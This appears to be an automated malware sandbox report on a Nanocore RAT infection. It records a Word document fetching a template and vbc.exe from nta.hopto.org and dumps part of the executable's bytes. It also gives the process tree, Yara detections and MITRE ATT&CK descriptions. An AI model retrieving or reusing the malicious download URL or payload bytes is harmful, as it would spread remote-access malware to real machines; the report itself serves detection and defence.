7e 24 5b 7c 5f 26 24 24 35 38 34 2c 5b 2b b0 37 3f 5b 26 37 30 39 5b 60 3f 3f 3f 3f 28 25 2c 3f 3c 3f 34 60 37 7c 27 b0 40 33 35 2d 5b 3f 60 5e 33 5b 30 3f 21 3a 32 3d 26 3f 25 23 5d 29 3f 21 3f 36 25 3f 39 3f 2b 3f 5d 37 28 5d 28 23 29 36 3a 3f 29 2f 36 b5 33 3a 3d 2a 27 2f 3f 37 2e 3c 34 3b 34 7e 31 5f 25 33 3f 26 34 b5 5d 29 60 5b 24 2b 3f b0 2b 7e 3f 37 40 24 26 a7 3f 3c 3b 3a 23 3d 35 3b 32 2b 3a 38 3f 36 Data Ascii: {\rt;^?.+24???3@\|]>#]$7^%#<7+<~2^>?~9(???7&);??/_8'3,3``?%::\|0%5~2[?^?91?.]=&$-#:[==:,~^9?([]`$1<,6!<&=@'__08?_^/?~6;??%-5<?-?5,.73+&?%%[.%2.'\|.?:`?@.&%7#?'?>&1=?//0%(!=];5$?(?06~[4=_$;=0[$!?>`\|_0;<,8?48<?20@,94\|[4/.:7??!<%%>%16[.;+`#5^,38[\|,[?<@:7'??[7?@4,~?\|/,.9?.?3-@$1?&~)&>6-]-\|?#48?3]<=53=/7)::336~/+2?!14`0__<&?:+~(2@5,!>&%~0+?~_'9+_8:#1???~\|'^-:9!#+.2=?7@!45>;].%7(-![.936?%~+'!_?@~;4?!%_,@(%3-&56.%=9,?[_'_?@?\|8+:7-(,_<;#+&0]4_?.>3.#-95:2=$?;;605##=3?.?&>,;01@4`]'=[%0'?,?~,.%#%`*)2-)?>???@~=:2>._.&:@%.7=,)?1)`??2>81!^2+5/'%+=<_;\|'21%`%59%/3?+,]+=,~??32%%`'2!]][<?%.??'(?9:%[=6:(>?@:_>&3#&`?\|]>!<?3.6%<(?_~1,/,//'5+@!`&-!=!2!#^;>37@-.;.!?)0;^;\|0):85!?:\|$?~]#?4_`$^)4?&=0]??,%?<~6\|8>;:+=>?)+22.]%/>?22\|!<)6`:]?(?_%>32!_[,,<-&.?~7<0&&]?%&^02!%>7+??:,%?$[&][?<+%_-?3&%4<7?/'%.#)-$(?94~$[\|_&$$584,[+7?[&709[`????(%,?<?4`7\|'@35-[?`^3[0?!:2=&?%#])?!?6%?9?+?]7(](#)6:?)/63:='/?7.<4;4~1_%3?&4])`[$+?+~?7@$&?<;:#=5;2+:8?6
May 3, 2021 14:31:01.070230007 CEST	722	OUT	HEAD /reg/v.dot HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Content-Length: 0 Connection: Keep-Alive Host: nta.hopto.org
May 3, 2021 14:31:01.277765036 CEST	722	IN	HTTP/1.1 200 OK Date: Mon, 03 May 2021 12:31:01 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3 Last-Modified: Sun, 02 May 2021 12:57:13 GMT ETag: "33a9-5c1586245fb40" Accept-Ranges: bytes Content-Length: 13225 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/msword

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49175	172.245.45.28	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 14:31:02.312216043 CEST	723	OUT	GET /reg/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: nta.hopto.org Connection: Keep-Alive
May 3, 2021 14:31:02.525949955 CEST	724	IN	HTTP/1.1 200 OK Date: Mon, 03 May 2021 12:31:02 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3 Last-Modified: Mon, 03 May 2021 07:22:11 GMT ETag: "116c00-5c167d1eb0284" Accept-Ranges: bytes Content-Length: 1141760 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a3 a4 8f 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 58 11 00 00 12 00 00 00 00 00 00 92 77 11 00 00 20 00 00 00 80 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 77 11 00 4f 00 00 00 00 80 11 00 d0 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 57 11 00 00 20 00 00 00 58 11 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 0e 00 00 00 80 11 00 00 10 00 00 00 5a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 11 00 00 02 00 00 00 6a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 77 11 00 00 00 00 00 48 00 00 00 02 00 05 00 04 84 00 00 3c 99 00 00 03 00 00 00 01 00 00 06 40 1d 01 00 00 5a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 20 00 00 0a 28 21 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 22 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 60 01 00 06 28 28 00 00 0a 00 2a 26 00 02 28 29 00 00 0a 00 2a ce 73 2a 00 00 0a 80 01 00 00 04 73 2b 00 00 0a 80 02 00 00 04 73 2c 00 00 0a 80 03 00 00 04 73 2d 00 00 0a 80 04 00 00 04 73 2e 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 33 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 34 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 35 00 00 0a 6f 36 00 00 0a 73 37 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`PXw @ @@wO H.textW X `.rsrcZ@@.relocj@BtwH<@Z0( (!(o"(#($(%(&('N(o`((&()ss+s,s-s.0~o/+0~o0+0~o1+0~o2+0~o3+0<~(4,!rp(5o6s7~+0~

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 3, 2021 14:30:43.755680084 CEST	172.67.8.238	443	192.168.2.22	49165	CN=www.cutt.ly CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US	CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 07 02:00:00 CEST 2021 Thu Jul 16 14:25:27 CEST 2020	Sun Apr 10 01:59:59 CEST 2022 Thu Jun 01 01:59:59 CEST 2023	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
May 3, 2021 14:30:43.755680084 CEST	172.67.8.238	443	192.168.2.22	49165	CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jul 16 14:25:27 CEST 2020	Thu Jun 01 01:59:59 CEST 2023		7dcce5b76c8b17472d024758970a406b
May 3, 2021 14:30:44.974302053 CEST	104.22.1.232	443	192.168.2.22	49166	CN=www.cutt.ly CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US	CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 07 02:00:00 CEST 2021 Thu Jul 16 14:25:27 CEST 2020	Sun Apr 10 01:59:59 CEST 2022 Thu Jun 01 01:59:59 CEST 2023	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
May 3, 2021 14:30:44.974302053 CEST	104.22.1.232	443	192.168.2.22	49166	CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jul 16 14:25:27 CEST 2020	Thu Jun 01 01:59:59 CEST 2023		05af1f5ca1b87cc9cc9b25185115607d
May 3, 2021 14:30:48.441967010 CEST	172.67.8.238	443	192.168.2.22	49167	CN=www.cutt.ly CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US	CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 07 02:00:00 CEST 2021 Thu Jul 16 14:25:27 CEST 2020	Sun Apr 10 01:59:59 CEST 2022 Thu Jun 01 01:59:59 CEST 2023	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
May 3, 2021 14:30:48.441967010 CEST	172.67.8.238	443	192.168.2.22	49167	CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jul 16 14:25:27 CEST 2020	Thu Jun 01 01:59:59 CEST 2023		05af1f5ca1b87cc9cc9b25185115607d
May 3, 2021 14:30:48.833014965 CEST	172.67.8.238	443	192.168.2.22	49168	CN=www.cutt.ly CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US	CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 07 02:00:00 CEST 2021 Thu Jul 16 14:25:27 CEST 2020	Sun Apr 10 01:59:59 CEST 2022 Thu Jun 01 01:59:59 CEST 2023	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
May 3, 2021 14:30:48.833014965 CEST	172.67.8.238	443	192.168.2.22	49168	CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jul 16 14:25:27 CEST 2020	Thu Jun 01 01:59:59 CEST 2023		05af1f5ca1b87cc9cc9b25185115607d
May 3, 2021 14:30:50.147686958 CEST	172.67.8.238	443	192.168.2.22	49171	CN=www.cutt.ly CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US	CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 07 02:00:00 CEST 2021 Thu Jul 16 14:25:27 CEST 2020	Sun Apr 10 01:59:59 CEST 2022 Thu Jun 01 01:59:59 CEST 2023	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
May 3, 2021 14:30:50.147686958 CEST	172.67.8.238	443	192.168.2.22	49171	CN=RapidSSL TLS DV RSA Mixed SHA256 2020 CA-1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Jul 16 14:25:27 CEST 2020	Thu Jun 01 01:59:59 CEST 2023		05af1f5ca1b87cc9cc9b25185115607d

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 152 Parent PID: 584

General

Start time:	14:30:34
Start date:	03/05/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fbe0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2904 Parent PID: 584

General

Start time:	14:30:54
Start date:	03/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: vbc.exe PID: 2860 Parent PID: 2904

General

Start time:	14:30:57
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x1380000
File size:	1141760 bytes
MD5 hash:	042AA11C6D49E1CCA5923F02D1B0A5AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.2132182056.00000000028DB000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 23%, ReversingLabs
Reputation:	low

Analysis Process: RegSvcs.exe PID: 3040 Parent PID: 2860

General

Start time:	14:30:59
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Imagebase:	0xa20000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: RegSvcs.exe PID: 3036 Parent PID: 2860

General

Start time:	14:31:00
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Imagebase:	0xa20000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: RegSvcs.exe PID: 2988 Parent PID: 2860

General

Start time:	14:31:00
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Imagebase:	0xa20000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388684959.0000000000910000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.2388684959.0000000000910000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388645448.00000000008A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.2388645448.00000000008A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388334936.00000000004A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.2388334936.00000000004A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388397893.00000000005B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.2388397893.00000000005B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388510368.0000000000770000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.2388510368.0000000000770000.00000004.00000001.sdmp, Author: Florian Roth Rule: NanoCore, Description: unknown, Source: 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388496518.0000000000750000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.2388496518.0000000000750000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388503811.0000000000760000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.2388503811.0000000000760000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388517018.0000000000780000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.2388517018.0000000000780000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388389251.00000000005A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.2388389251.00000000005A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388916748.0000000002250000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.2388916748.0000000002250000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2388635584.0000000000890000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.2388635584.0000000000890000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	moderate

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

